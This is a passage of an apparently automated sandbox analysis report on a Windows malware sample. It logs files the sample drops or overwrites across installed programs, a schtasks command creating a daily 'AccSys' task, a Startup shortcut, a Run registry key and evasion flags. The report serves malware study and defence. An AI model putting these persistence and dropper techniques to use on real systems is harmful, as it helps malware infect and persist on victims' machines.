                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                    Source: C:\Users\Public\kn.exeFile created: C:\Users\Public\Libraries\AnyDesk.PIFJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7z.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Juqmtmya.PIFJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFFile created: C:\Users\Public\Libraries\aymtmquJ.pifJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\alg.exeJump to dropped file

                    Boot Survival

                    barindex
                    Drops PE files to the user root directory
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:06 /du 23:59 /sc daily /ri 1 /f
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JuqmtmyaJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JuqmtmyaJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EBAB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,15_2_02EBAB1C
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
